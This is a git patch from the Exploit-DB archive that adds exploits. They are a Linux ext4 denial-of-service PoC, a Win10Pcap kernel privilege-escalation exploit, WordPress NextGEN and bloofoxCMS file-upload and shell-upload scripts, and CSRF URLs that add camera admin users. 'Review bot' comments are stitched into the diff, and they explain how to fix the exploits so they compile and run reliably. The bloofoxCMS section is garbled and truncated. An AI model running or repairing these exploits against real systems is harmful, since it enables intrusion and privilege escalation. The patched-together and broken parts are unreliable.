From 6123605b39c6285c7af81952b469ed2d06e50153 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sun, 1 Nov 2015 05:01:56 +0000
Subject: [PATCH] DB: 2015-11-01 10 new exploits
---
 files.csv | 9 ++
 platforms/android/remote/38586.txt | 9 ++
 platforms/hardware/remote/38582.html | 20 +++
 platforms/hardware/remote/38583.html | 26 ++++
 platforms/hardware/remote/38584.txt | 7 +
 platforms/linux/dos/38589.c | 58 ++++++++
 platforms/multiple/remote/38587.txt | 7 +
 platforms/php/webapps/38585.pl | 30 ++++
 platforms/php/webapps/38588.php | 137 ++++++++++++++++++
 platforms/php/webapps/38590.txt | 9 ++
 platforms/windows/local/38542.cpp | 205 +++++++++++++++++++++++++++
 11 files changed, 517 insertions(+)
 create mode 100755 platforms/android/remote/38586.txt
 create mode 100755 platforms/hardware/remote/38582.html
 create mode 100755 platforms/hardware/remote/38583.html
 create mode 100755 platforms/hardware/remote/38584.txt
 create mode 100755 platforms/linux/dos/38589.c
 create mode 100755 platforms/multiple/remote/38587.txt
 create mode 100755 platforms/php/webapps/38585.pl
 create mode 100755 platforms/php/webapps/38588.php
 create mode 100755 platforms/php/webapps/38590.txt
 create mode 100755 platforms/windows/local/38542.cpp
diff --git a/files.csv b/files.csv
index 7630f851b..3304c644e 100755
--- a/files.csv
+++ b/files.csv
@@ -34855,3 +34855,12 @@ id,file,description,date,author,platform,type,port
 38578,platforms/php/webapps/38578.txt,"Pligg CMS 2.0.2 - Directory Traversal",2015-10-30,"Curesec Research Team",php,webapps,0
 38579,platforms/php/webapps/38579.txt,"Pligg CMS 2.0.2 - CSRF Code Execution",2015-10-30,"Curesec Research Team",php,webapps,0
 38581,platforms/php/webapps/38581.txt,"Oxwall 1.7.4 - CSRF Vulnerability",2015-10-30,"High-Tech Bridge SA",php,webapps,0
+38582,platforms/hardware/remote/38582.html,"Brickcom Multiple IP Cameras Cross Site Request Forgery Vulnerability",2013-06-12,Castillo,hardware,remote,0
+38583,platforms/hardware/remote/38583.html,"Sony CH and DH Series IP Cameras Multiple Cross Site Request Forgery Vulnerabilities",2013-06-12,Castillo,hardware,remote,0
+38584,platforms/hardware/remote/38584.txt,"Grandstream Multiple IP Cameras Cross Site Request Forgery Vulnerability",2013-06-12,Castillo,hardware,remote,0
+38585,platforms/php/webapps/38585.pl,"WordPress NextGEN Gallery 'upload.php' Arbitrary File Upload Vulnerability",2013-06-12,"Marcos Garcia",php,webapps,0
+38586,platforms/android/remote/38586.txt,"TaxiMonger for Android 'name' Parameter HTML Injection Vulnerability",2013-06-15,"Ismail Kaleem",android,remote,0
+38587,platforms/multiple/remote/38587.txt,"Monkey HTTP Daemon Mandril Security Plugin Security Bypass Vulnerability",2013-06-14,felipensp,multiple,remote,0
+38588,platforms/php/webapps/38588.php,"bloofoxCMS 'index.php' Arbitrary File Upload Vulnerability",2013-06-17,"CWH Underground",php,webapps,0
+38589,platforms/linux/dos/38589.c,"Linux Kernel <= 3.0.5 'test_root()' Function Local Denial of Service Vulnerability",2013-06-05,"Jonathan Salwan",linux,dos,0
+38590,platforms/php/webapps/38590.txt,"et-chat Privilege Escalation and Arbitrary Shell Upload Vulnerabilities",2013-06-18,MR.XpR,php,webapps,0
diff --git a/platforms/android/remote/38586.txt b/platforms/android/remote/38586.txt
new file mode 100755
index 000000000..6a5235e2b
--- /dev/null
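Review bot: The new files.csv row for 38589 titles the entry "Linux Kernel <= 3.0.5 'test_root()' Function Local Denial of Service Vulnerability", while the banner comment added in platforms/linux/dos/38589.c in a later hunk says `kernel <= 3.10`, so the index and the PoC disagree about the affected version range. One of the two should be corrected so that searching the archive by version gives a consistent answer; which bound is the accurate one cannot be settled from this patch alone, so whichever source (the BID reference or the author's header) is taken as authoritative should be named in the fix.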
+++ b/platforms/android/remote/38586.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/60566/info
+
+TaxiMonger for Android is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+TaxiMonger 2.6.2 and 2.3.3 are vulnerable; other versions may also be affected.
+
+
\ No newline at end of file
diff --git a/platforms/hardware/remote/38582.html b/platforms/hardware/remote/38582.html
new file mode 100755
index 000000000..8cd6022e9
--- /dev/null
+++ b/platforms/hardware/remote/38582.html
@@ -0,0 +1,20 @@
+source: http://www.securityfocus.com/bid/60526/info
+
+Brickcom multiple IP cameras are prone to a cross-site request-forgery vulnerability.
+
+Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.
+
+Brickcom cameras running firmware 3.0.6.7, 3.0.6.12, and 3.0.6.16C1 are vulnerable; other versions may also be affected.
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/platforms/hardware/remote/38583.html b/platforms/hardware/remote/38583.html
new file mode 100755
index 000000000..c745a521a
--- /dev/null
+++ b/platforms/hardware/remote/38583.html
@@ -0,0 +1,26 @@
+source: http://www.securityfocus.com/bid/60529/info
+
+Sony CH and DH series IP cameras including SNCCH140, SNCCH180, SNCCH240, SNCCH280, SNCDH140, SNCDH140T, SNCDH180, SNCDH240, SNCDH240T, and SNCDH280 are prone to multiple cross-site request-forgery vulnerabilities.
+
+Exploiting these issues may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/platforms/hardware/remote/38584.txt b/platforms/hardware/remote/38584.txt
new file mode 100755
index 000000000..346f8b055
--- /dev/null
+++ b/platforms/hardware/remote/38584.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/60532/info
+
+Grandstream multiple IP cameras including GXV3501, GXV3504, GXV3601, GXV3601HD/LL, GXV3611HD/LL, GXV3615W/P, GXV3651FHD, GXV3662HD, GXV3615WP_HD, and GXV3500 are prone to a cross-site request-forgery vulnerability.
+
+Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.
+
+http://www.example.com/goform/usermanage?cmd=add&user.name=test3&user.password=test3&user.level=0
\ No newline at end of file
diff --git a/platforms/linux/dos/38589.c b/platforms/linux/dos/38589.c
new file mode 100755
index 000000000..69106af0c
--- /dev/null
+++ b/platforms/linux/dos/38589.c
@@ -0,0 +1,58 @@
+source: http://www.securityfocus.com/bid/60586/info
+
+The Linux Kernel is prone to a local denial-of-service vulnerability.
+
+Local attackers can exploit this issue to trigger an infinite loop which may cause denial-of-service conditions.
+
+/*
+** PoC - kernel <= 3.10 CPU Thread consumption in ext4 support. (Infinite loop)
+** Jonathan Salwan - 2013-06-05
+*/
+
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+
+struct ext4_new_group_input {
+ __u32 group;
+ __u64 block_bitmap;
+ __u64 inode_bitmap;
+ __u64 inode_table;
+ __u32 blocks_count;
+ __u16 reserved_blocks;
+ __u16 unused;
+};
+
+#define EXT4_IOC_GROUP_ADD _IOW('f', 8, struct ext4_new_group_input)
+
+int main(int ac, const char *av[]){
+ struct ext4_new_group_input input;
+ int fd;
+
+ if (ac < 2){
+ printf("Syntax : %s \n", av[0]);
+ printf("Example : %s /tmp\n", av[0]);
+ return -1;
+ }
+
+ printf("[+] Opening the ext4 device\n");
+ if ((fd = open(av[1], O_RDONLY)) < 0){
+ perror("[-] open");
+ return -1;
+ }
+
+ printf("[+] Trigger the infinite loop\n");
+ input.group = -1;
+ if (ioctl(fd, EXT4_IOC_GROUP_ADD, &input) < 0){
+ perror("[-] ioctl");
+ }
+
+ close(fd);
+ return 0;
+}
+
+
diff --git a/platforms/multiple/remote/38587.txt b/platforms/multiple/remote/38587.txt
new file mode 100755
index 000000000..3d8a6bc56
--- /dev/null
+++ b/platforms/multiple/remote/38587.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/60569/info
+
+The Mandril Security plugin for Monkey HTTP Daemon is prone to a security-bypass vulnerability.
+
+An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions, which may aid in launching further attacks
+
+http://www.example.com/%2ftest/
\ No newline at end of file
diff --git a/platforms/php/webapps/38585.pl b/platforms/php/webapps/38585.pl
new file mode 100755
index 000000000..76ffd6838
--- /dev/null
+++ b/platforms/php/webapps/38585.pl
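Review bot: In 38589.c `input` is declared without an initializer and only `input.group` is assigned before the struct is handed to `ioctl`, so `block_bitmap`, `inode_bitmap`, `inode_table`, `blocks_count`, `reserved_blocks` and `unused` reach the kernel as whatever happened to be on the stack; the request differs from run to run, which makes the PoC harder to reproduce and impossible to pin in a regression test. Declaring it as `struct ext4_new_group_input input = {0};` makes the request deterministic with no other change. Separately, `return -1` from `main` on the usage and `open` failure paths yields exit status 255; `return 1` is the conventional failure status and what a test harness would expect.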
@@ -0,0 +1,30 @@
+source: http://www.securityfocus.com/bid/60533/info
+
+The NextGEN Gallery plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files.
+
+An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in an arbitrary code execution within the context of the vulnerable application.
+
+NextGEN Gallery 1.9.12 is vulnerable; other versions may also be affected.
+
+#! /usr/bin/perl
+use LWP;
+use HTTP::Request::Common;
+
+my ($url, $file) = @ARGV;
+
+my $ua = LWP::UserAgent->new();
+my $req = POST $url,
+Content_Type => 'form-data',
+Content => [.
+name => $name,
+galleryselect => 1, # Gallery ID, should exist
+Filedata => [ "$file", "file.gif", Content_Type =>
+'image/gif' ]
+];
+my $res = $ua->request( $req );
+if( $res->is_success ) {
+print $res->content;
+} else {
+print $res->status_line, "\n";
+}
+
diff --git a/platforms/php/webapps/38588.php b/platforms/php/webapps/38588.php
new file mode 100755
index 000000000..4c74cd9d5
--- /dev/null
+++ b/platforms/php/webapps/38588.php
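Review bot: `Content => [.` carries a stray `.` after the opening bracket, which does not parse in Perl, and `$name` on the following line is never assigned — only `$url` and `$file` are read from `@ARGV` — so the committed script does not compile and, with the dot removed, would still send an empty `name` field. If the file is kept in the archive as a working PoC, those two lines would need to read `Content => [` and `my ($url, $file, $name) = @ARGV;`; if it is kept only as a historical record, a one-line comment at the top saying the script is known not to run would save the next reader the debugging. The absence of `use strict;` and `use warnings;` is what let the unassigned variable through.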
@@ -0,0 +1,137 @@ +source: http://www.securityfocus.com/bid/60585/info + +bloofoxCMS is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. + +An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. + +bloofoxCMS 0.5.0 is vulnerable;other versions may also be affected. + + \n"; +print "\nExample....: php $argv[0] target /bloofoxcms/ editor editor\n"; + die(); +} + +$host = $argv[1]; +$path = $argv[2]; + +$payload = "username={$argv[3]}&password={$argv[4]}&action=login"; + +$packet = "POST {$path}admin/index.php HTTP/1.0\r\n"; +$packet .= "Host: {$host}\r\n"; +$packet .= "Referer: {$host}{$path}admin/index.php\r\n"; +$packet .= "Content-Length: ".strlen($payload)."\r\n"; +$packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; +$packet .= "Connection: close\r\n\r\n{$payload}"; + +$response = http_send($host, $packet); + +if (!preg_match("/Location: index.php/i", $response)) die("\n[-] Login failed!\n"); +if (!preg_match("/Set-Cookie: ([^;]*);/i", $response, $sid)) die("\n[-] Session ID not found!\n"); + +print "\n..:: Login Successful ::..\n"; +print "\n..:: Waiting hell ::..\n\n"; + +$payload = "--o0oOo0o\r\n"; +$payload .= "Content-Disposition: form-data; name=\"filename\"; filename=\"sh.php\"\r\n"; +$payload .= "Content-Type: application/octet-stream\r\n\r\n"; +$payload .= " diff --git a/platforms/php/webapps/38590.txt b/platforms/php/webapps/38590.txt new file mode 100755 index 000000000..0bc7c292f --- /dev/null +++ b/platforms/php/webapps/38590.txt 
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/60660/info
+
+et-chat is prone to a privilege-escalation vulnerability and an arbitrary shell-upload vulnerability.
+
+An attacker can exploit these issues to gain elevated privileges within the application and upload arbitrary shells; this can result in an arbitrary code execution within the context of the vulnerable application.
+
+et-chat 3.07 is vulnerable; other versions may also be affected.
+
+http://www.example.com/chat/?AdminRegUserEdit&admin&id=4
\ No newline at end of file
diff --git a/platforms/windows/local/38542.cpp b/platforms/windows/local/38542.cpp
new file mode 100755
index 000000000..1361d870b
--- /dev/null
+++ b/platforms/windows/local/38542.cpp
@@ -0,0 +1,205 @@
+# Source: https://github.com/Rootkitsmm/Win10Pcap-Exploit
+
+/*
+Win10Pcap kernel-mode driver did not check the virtual addresses which are passed from the user-mode , IOCTL Using Neither Buffered Nor Direct I/O without ProbeForWrite to validating passed address
+
+you need find accurate Device name in runtime to send IOCTL , hardcoded device name dont lead to vulnerable code
+
+IOCTL handller write a string in passed address , string is something like "Global\WTCAP_EVENT_3889023063_1"
+
+ther was many way to exploit this vulnerability i decide to set privilege in process TOKEN with overwriting _SEP_TOKEN_PRIVILEGES
+
+overwriting token at address 0x034 with string "Global\WTCAP_EVENT" can set SeDebugPrivilege without corrupting sensitive Filds
+*/
+
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+
+#define SL_IOCTL_GET_EVENT_NAME CTL_CODE(0x8000, 1, METHOD_NEITHER, FILE_ANY_ACCESS)
+#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
+#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xc0000004L)
+
+/* found with :
+!token
+1: kd> dt nt!_OBJECT_HEADER
+ +0x000 PointerCount : Int4B
+ +0x004 HandleCount : Int4B
+ +0x004 NextToFree : Ptr32 Void
+ +0x008 Lock : _EX_PUSH_LOCK
+ +0x00c TypeIndex : UChar
+ +0x00d TraceFlags : UChar
+ +0x00e InfoMask : UChar
+ +0x00f Flags : UChar
+ +0x010 ObjectCreateInfo : Ptr32 _OBJECT_CREATE_INFORMATION
+ +0x010 QuotaBlockCharged : Ptr32 Void
+ +0x014 SecurityDescriptor : Ptr32 Void
+ +0x018 Body : _QUAD
+
+TypeIndex is 0x5
+*/
+#define HANDLE_TYPE_TOKEN 0x5
+
+
+// Undocumented SYSTEM_INFORMATION_CLASS: SystemHandleInformation
+const SYSTEM_INFORMATION_CLASS SystemHandleInformation =
+(SYSTEM_INFORMATION_CLASS)16;
+
+// The NtQuerySystemInformation function and the structures that it returns
+// are internal to the operating system and subject to change from one
+// release of Windows to another. To maintain the compatibility of your
+// application, it is better not to use the function.
+typedef NTSTATUS (WINAPI * PFN_NTQUERYSYSTEMINFORMATION)(
+ IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
+ OUT PVOID SystemInformation,
+ IN ULONG SystemInformationLength,
+ OUT PULONG ReturnLength OPTIONAL
+ );
+
+// Undocumented structure: SYSTEM_HANDLE_INFORMATION
+typedef struct _SYSTEM_HANDLE
+{
+ ULONG ProcessId;
+ UCHAR ObjectTypeNumber;
+ UCHAR Flags;
+ USHORT Handle;
+ PVOID Object;
+ ACCESS_MASK GrantedAccess;
+} SYSTEM_HANDLE, *PSYSTEM_HANDLE;
+
+typedef struct _SYSTEM_HANDLE_INFORMATION
+{
+ ULONG NumberOfHandles;
+ SYSTEM_HANDLE Handles[1];
+} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
+
+
+// Undocumented FILE_INFORMATION_CLASS: FileNameInformation
+const FILE_INFORMATION_CLASS FileNameInformation =
+(FILE_INFORMATION_CLASS)9;
+
+// The NtQueryInformationFile function and the structures that it returns
+// are internal to the operating system and subject to change from one
+// release of Windows to another. To maintain the compatibility of your
+// application, it is better not to use the function.
+typedef NTSTATUS (WINAPI * PFN_NTQUERYINFORMATIONFILE)(
+ IN HANDLE FileHandle,
+ OUT PIO_STATUS_BLOCK IoStatusBlock,
+ OUT PVOID FileInformation,
+ IN ULONG Length,
+ IN FILE_INFORMATION_CLASS FileInformationClass
+ );
+
+// FILE_NAME_INFORMATION contains name of queried file object.
+typedef struct _FILE_NAME_INFORMATION {
+ ULONG FileNameLength;
+ WCHAR FileName[1];
+} FILE_NAME_INFORMATION, *PFILE_NAME_INFORMATION;
+
+
+void* FindTokenAddressHandles(ULONG pid)
+{
+ /////////////////////////////////////////////////////////////////////////
+ // Prepare for NtQuerySystemInformation and NtQueryInformationFile.
+ //
+
+ // The functions have no associated import library. You must use the
+ // LoadLibrary and GetProcAddress functions to dynamically link to
+ // ntdll.dll.
+
+ HINSTANCE hNtDll = LoadLibrary(_T("ntdll.dll"));
+ assert(hNtDll != NULL);
+
+ PFN_NTQUERYSYSTEMINFORMATION NtQuerySystemInformation =
+ (PFN_NTQUERYSYSTEMINFORMATION)GetProcAddress(hNtDll,
+ "NtQuerySystemInformation");
+ assert(NtQuerySystemInformation != NULL);
+
+
+ /////////////////////////////////////////////////////////////////////////
+ // Get system handle information.
+ //
+
+ DWORD nSize = 4096, nReturn;
+ PSYSTEM_HANDLE_INFORMATION pSysHandleInfo = (PSYSTEM_HANDLE_INFORMATION)
+ HeapAlloc(GetProcessHeap(), 0, nSize);
+
+ // NtQuerySystemInformation does not return the correct required buffer
+ // size if the buffer passed is too small. Instead you must call the
+ // function while increasing the buffer size until the function no longer
+ // returns STATUS_INFO_LENGTH_MISMATCH.
+ while (NtQuerySystemInformation(SystemHandleInformation, pSysHandleInfo,
+ nSize, &nReturn) == STATUS_INFO_LENGTH_MISMATCH)
+ {
+ HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
+ nSize += 4096;
+ pSysHandleInfo = (SYSTEM_HANDLE_INFORMATION*)HeapAlloc(
+ GetProcessHeap(), 0, nSize);
+ }
+
+ for (ULONG i = 0; i < pSysHandleInfo->NumberOfHandles; i++)
+ {
+
+ PSYSTEM_HANDLE pHandle = &(pSysHandleInfo->Handles[i]);
+
+ if (pHandle->ProcessId == pid && pHandle->ObjectTypeNumber == HANDLE_TYPE_TOKEN)
+ {
+ printf(" ObjectTypeNumber %d , ProcessId %d , Object %p \r\n",pHandle->ObjectTypeNumber,pHandle->ProcessId,pHandle->Object);
+ return pHandle->Object;
+ }
+ }
+
+ /////////////////////////////////////////////////////////////////////////
+ // Clean up.
+ //
+ HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
+
+ return 0;
+}
+
+void main()
+{
+ DWORD dwBytesReturned;
+ DWORD ShellcodeFakeMemory;
+ HANDLE token;
+
+
+ // first create toke handle so find object address with handle
+ if(!OpenProcessToken(GetCurrentProcess(),TOKEN_QUERY,&token))
+ DebugBreak();
+
+ void* TokenAddress = FindTokenAddressHandles(GetCurrentProcessId());
+
+ CloseHandle(token);
+
+ // i dont want write fully weaponized exploit so criminal must write code to find "WTCAP_A_{B8296C9f-8ed4-48A2-84A0-A19DB94418E3" in runtime ( simple task :)
+ HANDLE hDriver = CreateFileA("\\\\.\\WTCAP_A_{B8296C9f-8ed4-48A2-84A0-A19DB94418E3}",GENERIC_READ | GENERIC_WRITE,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
+ if(hDriver!=INVALID_HANDLE_VALUE)
+ {
+ fprintf(stderr," Open Driver OK\n");
+
+ if (!DeviceIoControl(hDriver, SL_IOCTL_GET_EVENT_NAME, NULL,0x80,(void*)((char*)TokenAddress+0x34),NULL,&dwBytesReturned, NULL))
+ {
+ fprintf(stderr,"send IOCTL error %d.\n",GetLastError());
+ return;
+ }
+ else fprintf(stderr," Send IOCTL OK\n");
+ }
+
+ else
+ {
+ fprintf(stderr," Open Driver error %d.\n",GetLastError());
+ return;
+ }
+
+
+ CloseHandle(hDriver);
+ getchar();
+
+}
\ No newline at end of file
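Review bot: `FindTokenAddressHandles` leaks `pSysHandleInfo` on its success path — `return pHandle->Object;` inside the `for` loop bypasses the `HeapFree` under "Clean up." — and when `NtQuerySystemInformation` fails with any status other than `STATUS_INFO_LENGTH_MISMATCH` the loop still reads `NumberOfHandles` from a buffer that was never filled, even though a `STATUS_SUCCESS` macro is defined at the top of the file and never consulted. Neither `HeapAlloc` result is checked, and both `assert` calls compile out under `NDEBUG`, so a release build would call a null `NtQuerySystemInformation` if `GetProcAddress` failed. In `main`, the `return;` in the `DeviceIoControl` error branch skips `CloseHandle(hDriver)`, `ShellcodeFakeMemory` is declared but never used, and `void main()` is non-standard (`int main(void)`). The rewrite below keeps the query status, copies the match out of the buffer before freeing it, and frees on every exit.
```cpp
    NTSTATUS status;
    while ((status = NtQuerySystemInformation(SystemHandleInformation, pSysHandleInfo,
                                              nSize, &nReturn)) == STATUS_INFO_LENGTH_MISMATCH)
    {
        // … unchanged: free and re-HeapAlloc with nSize += 4096 …
    }
    if (status != STATUS_SUCCESS)
    {
        HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
        return 0;
    }

    void* found = 0;
    for (ULONG i = 0; i < pSysHandleInfo->NumberOfHandles; i++)
    {
        PSYSTEM_HANDLE pHandle = &(pSysHandleInfo->Handles[i]);
        if (pHandle->ProcessId == pid && pHandle->ObjectTypeNumber == HANDLE_TYPE_TOKEN)
        {
            // … unchanged: printf of the matching entry …
            found = pHandle->Object;
            break;
        }
    }

    HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
    return found;
```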